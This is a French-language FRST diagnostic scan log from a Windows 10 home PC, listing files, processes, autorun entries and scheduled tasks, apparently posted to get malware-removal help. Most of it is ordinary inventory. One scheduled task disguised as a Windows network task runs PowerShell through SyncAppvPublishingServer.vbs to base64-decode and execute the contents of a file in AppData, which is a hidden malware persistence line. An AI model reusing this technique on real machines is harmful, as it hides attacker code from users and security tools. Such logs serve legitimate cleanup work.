2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ___SD C:\WINDOWS\system32\F12
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ___SD C:\WINDOWS\system32\dsc
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\PerceptionSimulation
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\migwiz
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\InstallShield
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\downlevel
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\ShellExperiences
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\migwiz
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\Keywords
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\downlevel
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\Com
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2021-07-10 19:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2021-07-10 19:28 - 2019-12-07 11:03 - 000000000 ____D C:\WINDOWS\servicing
2021-07-10 19:27 - 2019-12-07 16:53 - 000000000 ____D C:\Program Files\Windows Portable Devices
2021-07-10 19:27 - 2019-12-07 16:53 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2021-07-10 19:27 - 2019-12-07 16:53 - 000000000 ____D C:\Program Files\Windows Multimedia Platform
2021-07-10 19:27 - 2019-12-07 16:53 - 000000000 ____D C:\Program Files (x86)\Windows Portable Devices
2021-07-10 19:27 - 2019-12-07 16:53 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2021-07-10 19:27 - 2019-12-07 16:53 - 000000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2021-07-10 19:27 - 2019-12-07 11:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-07-10 19:27 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\IME
2021-07-10 19:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\Containers
2021-07-10 17:14 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\registration
2021-07-10 14:03 - 2021-06-06 19:46 - 000000000 ____D C:\Users\eddy99\OneDrive\Documents\Apowersoft PDF Converter
2021-07-04 15:39 - 2013-03-11 21:07 - 000000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2021-07-04 15:02 - 2021-03-16 20:33 - 000000000 ____D C:\Users\eddy99\AppData\Roaming\FxSound LLC
2021-07-02 23:10 - 2020-12-16 10:26 - 000000000 ____D C:\ProgramData\Package Cache
2021-07-02 09:37 - 2020-11-19 01:31 - 000003634 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-07-02 09:37 - 2020-11-19 01:31 - 000003510 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2021-07-01 19:55 - 2020-12-15 02:32 - 000002249 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-06-30 20:26 - 2021-03-10 14:34 - 000000153 _____ C:\config.ini
2021-06-30 20:17 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\NDF
2021-06-30 20:16 - 2012-11-05 19:52 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2021-06-30 20:14 - 2021-03-10 14:18 - 000000000 ____D C:\Users\eddy99\AppData\Local\TP-Link
2021-06-30 20:13 - 2020-12-15 02:03 - 000000000 ____D C:\temp
2021-06-27 10:37 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2021-06-22 15:59 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-06-21 23:36 - 2020-12-15 02:34 - 000000000 ____D C:\Program Files\Common Files\AV
2021-06-21 23:10 - 2020-12-15 02:23 - 000000000 ____D C:\WINDOWS\system32\Drivers\NGCx64
2021-06-20 15:56 - 2020-12-15 02:22 - 000000000 ____D C:\ProgramData\Norton
2021-06-20 14:27 - 2021-06-15 15:14 - 000001134 _____ C:\ProgramData\Microsoft\Windows\Start Menu\WinRAR.lnk
2021-06-20 14:27 - 2021-06-15 15:14 - 000000000 ____D C:\Users\eddy99\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2021-06-20 14:27 - 2021-06-15 15:14 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2021-06-18 19:33 - 2021-02-20 21:38 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools
==================== Fichiers à la racine de certains dossiers ========
2021-06-20 16:07 - 2021-06-20 16:07 - 000000644 _____ () C:\ProgramData\SMRResults540.dat
2021-06-01 08:23 - 2021-07-18 13:26 - 003258008 _____ (Nicolas Coolman) C:\Users\eddy99\ZHPCleaner.exe
2021-04-13 15:30 - 2021-05-08 17:51 - 000007667 _____ () C:\Users\eddy99\AppData\Local\resmon.resmoncfg
==================== SigCheckExt =========================
2020-12-20 23:29 - 2011-11-25 14:09 - 000312832 ____N (Brother Industries, Ltd.) C:\WINDOWS\system32\BrFaxTxAppRun64.dll
2020-12-20 23:29 - 2012-07-27 07:07 - 000087040 ____R (Brother Industries, Ltd.) C:\WINDOWS\system32\BrNetSti.dll
2020-12-20 23:29 - 2012-06-12 09:38 - 000054272 ____R (Brother Industries,Ltd) C:\WINDOWS\system32\Brnsplg.dll
2020-12-20 23:29 - 2005-04-22 06:36 - 000143360 ____R C:\WINDOWS\system32\BrSNMP64.dll
2020-12-20 23:29 - 2012-04-11 06:27 - 000058880 ____R (Brother Industries,Ltd.) C:\WINDOWS\system32\BrWiaNCp.dll
2012-07-25 22:22 - 2012-07-26 05:07 - 007300096 _____ (Intel Corporation) C:\WINDOWS\system32\igd10umd64.dll
2012-07-25 22:22 - 2012-07-26 05:07 - 007228416 _____ (Intel Corporation) C:\WINDOWS\system32\igdumd64.dll
2012-07-25 22:22 - 2012-07-26 05:07 - 000243712 _____ (Intel Corporation) C:\WINDOWS\system32\iglhcp64.dll
2012-07-25 22:22 - 2012-07-26 05:07 - 000524800 _____ (Intel Corporation) C:\WINDOWS\system32\iglhsip64.dll
2020-12-20 23:29 - 2012-03-19 06:09 - 000316928 ____R (brother) C:\WINDOWS\system32\NSSRH64.dll
2017-08-13 09:49 - 2017-08-13 09:49 - 000291128 _____ (IvoSoft) C:\WINDOWS\system32\StartMenuHelper64.dll
2021-03-10 14:33 - 2010-03-15 20:45 - 000073728 ____N (Brother Industries Ltd.) C:\WINDOWS\SysWOW64\BrDctF2.dll
2021-03-10 14:33 - 2007-12-13 23:16 - 000005120 ____N (Brother Industries Ltd.) C:\WINDOWS\SysWOW64\BrDctF2L.dll
2021-03-10 14:33 - 2012-07-09 18:19 - 000005120 ____N (Brother Industries Ltd.) C:\WINDOWS\SysWOW64\BrDctF2S.dll
2013-03-11 20:35 - 2012-11-02 12:41 - 000053248 _____ (Windows XP Bundled build C-Centric Single User) C:\WINDOWS\SysWOW64\CSVer.dll
2012-06-24 01:24 - 2012-06-24 01:24 - 005892608 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igd10umd32.dll
2012-07-25 22:22 - 2012-06-24 01:24 - 005895680 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\igdumd32.dll
2012-07-25 22:22 - 2012-06-02 16:32 - 000201216 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\iglhcp32.dll
2012-07-25 22:22 - 2012-06-02 16:32 - 000519680 _____ (Intel Corporation) C:\WINDOWS\SysWOW64\iglhsip32.dll
2012-07-27 12:36 - 2012-07-27 12:36 - 000001536 _____ C:\WINDOWS\SysWOW64\IusEventLog.dll
2006-07-11 19:43 - 2006-07-11 19:43 - 001060864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc71.dll
2006-07-11 20:02 - 2006-07-11 20:02 - 001053184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc71u.dll
2013-03-11 21:59 - 2013-03-11 21:59 - 000499712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp71.dll
2006-07-11 19:35 - 2006-07-11 19:35 - 000348160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr71.dll
2021-03-10 14:33 - 2012-03-19 14:09 - 000245760 ____N (brother) C:\WINDOWS\SysWOW64\NSSearch.dll
2017-08-13 09:49 - 2017-08-13 09:49 - 000248120 _____ (IvoSoft) C:\WINDOWS\SysWOW64\StartMenuHelper32.dll
2005-09-07 14:03 - 2005-09-07 14:03 - 000722192 ____R (Microsoft Corporation) C:\WINDOWS\SysWOW64\Vb40032.dll
2008-08-07 12:50 - 2008-08-07 12:50 - 001261568 _____ (Zeon International Investment Corp. ) C:\WINDOWS\SysWOW64\ZDImage2pdf7.dll
2013-03-11 20:36 - 2012-11-16 03:32 - 000008192 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\IntelMEFWVer.dll
2021-06-01 08:23 - 2021-07-18 13:26 - 003258008 _____ (Nicolas Coolman) C:\Users\eddy99\ZHPCleaner.exe
2021-07-16 17:34 - 2021-07-16 17:34 - 064650240 _____ (The Chromium Authors) C:\Users\eddy99\Downloads\chromium_93-0-4578_en_432989_32.exe
2020-12-15 14:28 - 2020-12-15 14:28 - 000380928 _____ C:\Users\eddy99\Downloads\imgtq9nk-2.2.19882.exe
2021-06-25 23:24 - 2018-01-30 09:46 - 043482128 ____R C:\Users\eddy99\Downloads\Setup.exe
2021-01-05 23:21 - 2020-12-25 17:38 - 000611328 ____R C:\Users\eddy99\OneDrive\Documents\chrome_elf.dll
2021-04-13 13:18 - 2021-04-13 13:18 - 026724770 _____ (The qBittorrent project) C:\Users\eddy99\OneDrive\Documents\qbittorrent_4.3.4.1_x64_setup.exe
==================== SigCheck ============================
(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)
==================== Fin de FRST.txt ========================
Exécuté par eddy99 (administrateur) sur FAMILLE (MEDION MS-7797) (18-07-2021 14:17:23)
Exécuté depuis C:\Users\eddy99\OneDrive\Bureau
Profils chargés: eddy99
Platform: Windows 10 Home Version 21H1 19043.1110 (X64) Langue: Français (France)
Navigateur par défaut: Chrome
Mode d'amorçage: Normal
==================== Processus (Avec liste blanche) =================
(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)
(Acresso Software Inc. -> Acresso Corporation) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(BitTorrent Inc -> BitTorrent Inc.) C:\Users\eddy99\AppData\Roaming\uTorrent\updates\3.5.5_45952\utorrentie.exe <2>
(BitTorrent Inc -> BitTorrent Inc.) C:\Users\eddy99\AppData\Roaming\uTorrent\uTorrent.exe
(Brother Industries, Ltd.) [Fichier non signé] C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
(Brother Industries, Ltd.) [Fichier non signé] C:\Program Files (x86)\Browny02\BrYNSvc.exe
(CyberLink -> CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(CyberLink -> CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(CyberLink -> CyberLink) C:\Program Files (x86)\CyberLink\PowerDVD10\Device\MediaServer\CLMSServer.exe
(Google Inc (TEST) -> Epic Privacy Browser) [Fichier non signé] C:\Users\eddy99\AppData\Local\Epic Privacy Browser\Installer\EpicUpdate.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.92\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.92\GoogleCrashHandler64.exe
(Google LLC -> Google LLC) C:\Program Files\Google\Chrome\Application\chrome.exe <39>
(Intel Corporation - Intel® Rapid Storage Technology -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Intel® Trusted Connect Service -> Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Ivaylo Beltchev -> IvoSoft) [Fichier non signé] C:\Program Files\Classic Shell\ClassicStartMenu.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\eddy99\AppData\Local\Microsoft\OneDrive\21.129.0627.0002\FileCoAuth.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\eddy99\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_3.2106.14307.0_x64__8wekyb3d8bbwe\Cortana.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\HxOutlook.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\HxTsr.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_12105.1001.23.0_x64__8wekyb3d8bbwe\WinStore.App.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(NortonLifeLock Inc. -> Broadcom) C:\Program Files\Norton Security\Engine\22.21.5.44\NortonSecurity.exe <2>
(NortonLifeLock Inc. -> NortonLifeLock Inc.) C:\Program Files\Norton Security\Engine\22.21.5.44\nsWscSvc.exe
(Nuance Communications, Inc. -> Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
(Nuance Communications, Inc. -> Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe
(Nuance Communications, Inc. -> Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe
(NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(Piriform Software Ltd -> Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(TP-Link Technologies Co., Ltd) [Fichier non signé] C:\Program Files (x86)\TP-Link\TP-Link Wireless Adapter WPS Tool\TWCU.exe
==================== Registre (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13192848 2012-08-20] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [Classic Start Menu] => C:\Program Files\Classic Shell\ClassicStartMenu.exe [163640 2017-08-13] (Ivaylo Beltchev -> IvoSoft) [Fichier non signé]
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [285240 2012-11-19] (Intel Corporation - Intel® Rapid Storage Technology -> Intel Corporation)
HKLM-x32\...\Run: [CLMLServer_For_P2G8] => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [111120 2012-06-08] (CyberLink -> CyberLink)
HKLM-x32\...\Run: [CLVirtualDrive] => C:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe [491120 2012-07-20] (CyberLink -> CyberLink Corp.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [93296 2012-07-13] (CyberLink -> CyberLink Corp.)
HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [146584 2017-11-07] (Brother Industries, Ltd. -> Brother Industries, Ltd.)
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3076096 2012-06-06] (Brother Industries, Ltd.) [Fichier non signé]
HKLM-x32\...\Run: [IndexSearch] => C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe [46952 2011-08-02] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
HKLM-x32\...\Run: [PaperPort PTD] => C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe [30568 2011-08-02] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDFHook] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe [636192 2010-03-05] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDF5 Registry Controller] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe [62752 2010-03-05] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc. -> Apple Inc.)
HKLM\...\Policies\Explorer: [ConfirmFileDelete] 1
HKU\S-1-5-21-3835626661-1005971116-1630247016-1002\...\Run: [Epic Privacy Browser Installer] => C:\Users\eddy99\AppData\Local\Epic Privacy Browser\Installer\EpicUpdate.exe [509096 2020-12-16] (Google Inc (TEST) -> Epic Privacy Browser) [Fichier non signé]
HKU\S-1-5-21-3835626661-1005971116-1630247016-1002\...\Run: [utweb] => "C:\Users\eddy99\AppData\Roaming\uTorrent Web\utweb.exe" /MINIMIZED
HKU\S-1-5-21-3835626661-1005971116-1630247016-1002\...\Run: [uTorrent] => C:\Users\eddy99\AppData\Roaming\uTorrent\uTorrent.exe [1950504 2021-04-05] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-3835626661-1005971116-1630247016-1002\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Software Inc. -> Acresso Corporation)
HKU\S-1-5-21-3835626661-1005971116-1630247016-1002\...\Run: [Advanced Recent Access] => C:\Program Files (x86)\TSS\Advanced Recent Access\Advanced Recent Access.exe
HKU\S-1-5-21-3835626661-1005971116-1630247016-1002\...\Run: [] => [X]
HKU\S-1-5-21-3835626661-1005971116-1630247016-1002\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [34508416 2021-06-17] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-3835626661-1005971116-1630247016-1002\...\Run: [WPSTool] => C:\Program Files (x86)\TP-Link\TP-Link Wireless Adapter WPS Tool\TWCU.exe [1891840 2018-01-30] (TP-Link Technologies Co., Ltd) [Fichier non signé]
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\91.0.4472.124\Installer\chrmstp.exe [2021-07-01] (Google LLC -> Google LLC)
==================== Tâches planifiées (Avec liste blanche) ============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
Task: {0334D116-C39C-4D22-8D52-82C361A5EFD8} - System32\Tasks\NCH Software\PixillionSevenDays => C:\Program Files (x86)\NCH Software\Pixillion\Pixillion.exe [2012704 2021-06-07] (NCH Software, Inc. -> NCH Software)
Task: {0DDB73BB-E9A8-48C7-85F5-43E1321ED4B3} - System32\Tasks\Microsoft\Windows\SideShow\SystemDataProviders => {7CCA6768-8373-4D28-8876-83E8B4E3A969}
Task: {16841D09-F088-42B6-9D9A-03B7DC89C2F7} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [233824 2012-06-14] (Intel® Services Manager -> Intel Corporation)
Task: {1C67B312-95A2-42DC-A324-DB28138CD485} - System32\Tasks\Microsoft\Windows\NetService\Network\WindowsNetwork => C:\Windows\System32\SyncAppvPublishingServer.vbs -> "n;[string]$content=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([IO.File]::ReadAllText('C:\Users\eddy99\AppData\Roaming\logs.txt').Replace('-','')));IEX $content;"
Task: {1D3D7BE4-DA67-41A4-B832-0B101AA30289} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155592 2020-12-15] (Google LLC -> Google LLC)
Task: {2265DFCB-D646-40D7-B474-C84CCCC9BF3F} - System32\Tasks\Opera scheduled assistant Autoupdate 1608146455 => C:\Users\eddy99\AppData\Local\Programs\Opera\launcher.exe -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\eddy99\AppData\Local\Programs\Opera\assistant" $(Arg0)
Task: {29E9B4B3-FB15-4956-9C93-7AD389707F46} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton Security Online\Upgrade.exe [2345120 2021-05-31] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
Task: {2D8D6270-EBA9-4E16-8C67-DEAACBED18DA} - System32\Tasks\Norton Security with Backup\Norton Security Online Error Analyzer => C:\Program Files\Norton Security\Engine\22.21.5.44\SymErr.exe [115696 2021-05-31] (NortonLifeLock Inc. -> NortonLifeLock Inc)
Task: {3141AAC7-DE44-4B29-9D2D-F58CA6F46ABD} - System32\Tasks\Microsoft\Windows\SideShow\SessionAgent => {45F26E9E-6199-477F-85DA-AF1EDFE067B1}
Task: {34B89F26-D9E5-431E-8EBA-8B6AB9388F65} - System32\Tasks\Opera scheduled Autoupdate 1608146440 => C:\Users\eddy99\AppData\Local\Programs\Opera\launcher.exe
Task: {52451D21-23D7-4680-8E16-96CA703C5EB7} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [662464 2018-03-24] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {60077B5E-11BE-44F4-B2CC-31934BC12B8E} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [522688 2018-03-24] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {69033476-7E07-42CC-A1AD-D4466A055F05} - System32\Tasks\Norton Security with Backup\Norton Security Online Autofix => C:\Program Files\Norton Security\Engine\22.21.5.44\SymErr.exe [115696 2021-05-31] (NortonLifeLock Inc. -> NortonLifeLock Inc)
Task: {6984D361-1E83-420C-B009-777DF9F2A0D3} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe [469952 2018-03-24] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files (x86)\NVIDIA Corporation\NvBackend\NvBatteryBoostCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerBatteryBoostCheck.log
Task: {7C0C03ED-4D20-4255-B657-BB8A2195D44E} - System32\Tasks\Microsoft\Windows\MobilePC\HotStart => {06DA0625-9701-43DA-BFD7-FBEEA2180A1E}
Task: {7E16430A-31C7-41E5-8444-36E7AD40526B} - System32\Tasks\Norton Security with Backup\Norton Security Online Error Processor => C:\Program Files\Norton Security\Engine\22.21.5.44\SymErr.exe [115696 2021-05-31] (NortonLifeLock Inc. -> NortonLifeLock Inc)
Task: {919C494D-482C-4490-97F9-6427AEE41F63} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [155592 2020-12-15] (Google LLC -> Google LLC)
Task: {94CD9053-54E4-4574-ADC3-46C128E1EEF8} - System32\Tasks\Microsoft\Windows\SideShow\GadgetManager => {FF87090D-4A9A-4F47-879B-29A80C355D61}
Task: {970DDEE7-0B0A-4B7A-854B-46BBD547E564} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d => C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [233824 2012-06-14] (Intel® Services Manager -> Intel Corporation)
Task: {A539B4BA-3E66-471E-AA08-13E5830EAA66} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1557200 2021-01-26] (Adobe Inc. -> Adobe Inc.)
Task: {AF69FF99-32AE-4571-A0D6-C128C94A464B} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2069952 2018-03-24] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {B4112717-F5BA-4732-9914-F03F2C2C19A4} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [757184 2018-03-24] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {B577B748-6FBE-46FA-8F16-6BB532A1D9C4} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [28880512 2021-06-17] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {B5A343F7-377F-4ACD-A8D2-B4D500535626} - System32\Tasks\Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor => {EA9155A3-8A39-40B4-8963-D3C761B18371}
Task: {B86B6C80-E4B3-465C-84A6-F5BC7A5D761D} - System32\Tasks\Norton WSC Integration => C:\Program Files\Norton Security\Engine\22.21.5.44\WSCStub.exe [643584 2021-05-31] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
Task: {C6D3FCE9-3749-4200-8C85-C3372F1F5B34} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [976832 2018-03-24] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {CFF75ADA-E3FD-4F6F-BBB9-38E179FEA761} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [684976 2021-06-17] (Piriform Software Ltd -> Piriform)
